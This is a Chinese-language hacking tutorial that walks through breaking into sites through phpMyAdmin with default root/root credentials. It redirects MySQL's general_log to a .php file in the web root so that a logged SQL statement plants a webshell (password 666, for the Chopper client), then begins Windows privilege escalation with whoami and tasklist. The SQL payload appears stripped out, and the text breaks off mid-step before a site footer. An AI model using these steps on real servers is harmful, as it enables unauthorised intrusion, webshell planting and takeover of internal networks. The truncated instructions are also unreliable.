黑客入侵数据库指令

phpMyAdmin弱口令，从数据库杀到内网一条龙

超超超超超详细

ps：不混娱乐圈，mors是我大哥，不服喷他

什么是phpMyAdmin？

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，也就是于远端管理MySQL数据库，方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法，方便编写网页时所需要的sql语法正确性。

以上这些都不重要，重要的是能干什么？[滑稽]

phpMyAdmin在配置的时候，如果不去修改，默认账号密码就是root/root

什么？你问我他为什么不去修改？

不是每个人都懂这些的好吧？

看看有多少傻瓜式搭建网站的帖子就知道了

当初在帮别人改代码的时候

惊奇的发现源码里面有木马！

更可笑的是，还跟我说是特意这样写的！

着实把我逗笑了

偏偏小白们还看不出来

好了好了，言归正传

弱口令进了数据库我们能干嘛呢？

当然是拿shell啊

先找网站的根目录

一个是是否开启，一个是写入路径

general_log          一般是off，改成on

general_log_file   C:\phpStudy\WWW\log.php

改成你喜欢的名字，比如：

general_log_file   C:\phpStudy\WWW\123.php

执行一句话：

select ;

这样木马就被写入了123.php里面

密码是666，菜刀连接

原理就是，你执行的sql语句会被日志记录下来

拿到shell之后呢？当然是提权啦！

用shell打开虚拟终端

1.whoami看看啥权限

（有的是system权限，还有的可能是Administrator，还有比较鸡贼的，看似是Administrator，实际权限低的可怜）

2.tasklist  /svc 找远程服务（Windows远程服务名称为：TermService）记录PID

3.net

万汇资源网终身永久会员

打赏 收藏 海报 链接